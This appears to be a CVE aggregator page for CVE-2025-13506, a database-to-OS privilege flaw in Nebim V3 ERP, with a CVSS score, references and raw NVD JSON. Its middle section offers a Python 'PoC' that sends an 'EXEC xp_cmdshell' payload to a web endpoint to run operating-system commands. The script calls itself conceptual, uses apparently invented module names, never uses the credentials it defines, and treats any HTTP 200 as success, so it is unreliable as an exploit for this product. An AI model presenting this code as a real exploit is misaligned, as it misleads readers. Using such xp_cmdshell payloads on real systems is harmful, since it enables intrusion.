CVE-2025-13506

Description

Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database.This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Nebim V3 ERP >= 2.0.59 且 < 3.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13506 PoC - Nebim V3 ERP Privilege Escalation
# Target: Nebim V3 ERP Database to OS Command Execution
# Note: This is a conceptual PoC for authorized security testing only

import requests
import sys

TARGET_URL = "http://target-server:port/NebimV3/"
SESSION_COOKIE = "your_session_cookie"

def exploit_cve_2025_13506():
    """
    Demonstrates privilege escalation via database to OS control
    Requires low-privilege database user credentials
    """
    print("[*] CVE-2025-13506 - Nebim V3 ERP Privilege Escalation")
    
    # Step 1: Authenticate with low-privilege account
    auth_payload = {
        "username": "low_priv_user",
        "password": "password123"
    }
    
    # Step 2: Exploit database privilege escalation
    # Note: Actual exploitation requires understanding of Nebim V3 ERP internals
    exploit_payload = {
        "module": "DatabaseCommand",
        "action": "Execute",
        "query": "EXEC xp_cmdshell 'whoami'"
    }
    
    print("[+] Sending exploit payload...")
    
    # Step 3: Verify OS command execution
    response = requests.post(
        TARGET_URL,
        json=exploit_payload,
        cookies={"session": SESSION_COOKIE}
    )
    
    if response.status_code == 200:
        print("[+] Exploitation successful - OS command executed")
        print(f"[+] Response: {response.text}")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    print("[!] For authorized security testing only")
    exploit_cve_2025_13506()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13506
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13506
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13506/
[4] VulDB https://vuldb.com/cve/CVE-2025-13506
[5] https://www.usom.gov.tr/bildirim/tr-25-0450

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13506", "sourceIdentifier": "[email protected]", "published": "2025-12-12T13:15:43.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database.This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-250"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0450", "source": "[email protected]"}]}}